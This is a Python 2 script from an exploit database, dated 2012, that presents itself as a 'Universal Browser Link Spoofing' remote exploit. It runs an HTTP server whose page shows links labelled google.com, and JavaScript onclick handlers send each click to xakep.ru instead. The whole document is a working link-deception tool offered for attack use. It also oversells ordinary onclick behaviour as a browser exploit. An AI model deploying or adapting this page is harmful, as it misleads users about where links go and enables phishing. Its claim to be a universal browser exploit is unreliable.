|
#!/usr/bin/env python
'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm S4(uR4 member from r00tw0rm team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
'''
#
# Name : Universal Browser Link Spoofing
# Date : may, 30 2012
# Author : S4(uR4
# Platform : all
# Type : remote exploit
# Web : www.r00tw0rm.com
# Email : satsura@r00tw0rm.com
# Credit and special thanx : iamjuza
# Tested on : Mozilla Firefox 12, Google Chrome 19, Internet Explorer 9.0, Opera 11.62, Safari 5.1.2
# Special thanks to : r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com)
# Xenu, Versus71, alsa7r, mich4th3c0wb0y, FInnH@X, th3breacher, s3rver.exe (r00tw0rm.com)
import sys
import socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_exploit(self):
exploit = '''
<html><head><title>Remote Browser Link Spoofing Exploit(Webkit, Gecko, Presto, IE)</title></head><body bgcolor='#969696'>
<h1>Spoofing Exploit (for all browsers engine : Webkit, Gecko, Presto, IE)</h1>
<pre>------------------------------------------------</pre>
Method this.href=" : <a href="http://www.google.com/" onclick="this.href='http://xakep.ru'">Click me!</a><br />
Method location.reload='' : <a href="http://www.google.com/" onclick="location.reload='http://www.xakep.ru'; return false;">Click me!</a><br />
Method location.replace(''): <a href="http://www.google.com/" onclick="location.replace('http://www.xakep.ru'); return false;">Click me!</a><br />
Methon location.assign('') : <a href="http://www.google.com/" onclick="location.assign('http://www.xakep.ru'); return false;">Click me!</a><br />
<pre>------------------------------------------------</pre>
Method window.location.assign('') : <a href="http://www.google.com/" onclick="window.location.assign('http://www.xakep.ru'); return false;">Click me!</a><br />
Method window.location.replace('') : <a href="http://www.google.com/" onclick="window.location.replace('http://www.xakep.ru'); return false;">Click me!</a><br />
Method window.location.href='' : <a href="http://www.google.com/" onclick="window.location.href='http://xakep.ru'; return false;">Click me!</a><br />
<pre>------------------------------------------------</pre>
</body>
</html>
'''
return exploit
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
try:
if self.path == '/':
print
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
print '[+] Sending exploit to %s ...' % self.client_address[0]
self.wfile.write(self.get_exploit())
print '[+] Exploit sent to %s' % self.client_address[0]
except:
print '[-] Error : an error has occured while serving the HTTP request'
exit_program()
def exit_program():
print '[+] Exiting ...'
sys.exit(0)
def main():
if len(sys.argv) != 2:
print 'Usage: %s [any port between 0 and 65535]' % sys.argv[0]
sys.exit(0)
try:
port = int(sys.argv[1])
if port < 0 or port > 65535:
raise ValueError
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[+] Server is running at http://%s:%d/' % (ip, port)
try:
serv.serve_forever()
except:
exit_program()
except socket.error:
print '[-] Error : a socket error has occurred'
exit_program()
except ValueError:
print '[-] Error : an invalid port number was given'
exit_program()
if __name__ == '__main__':
main()
|
| |
|
推荐
评论(0条)
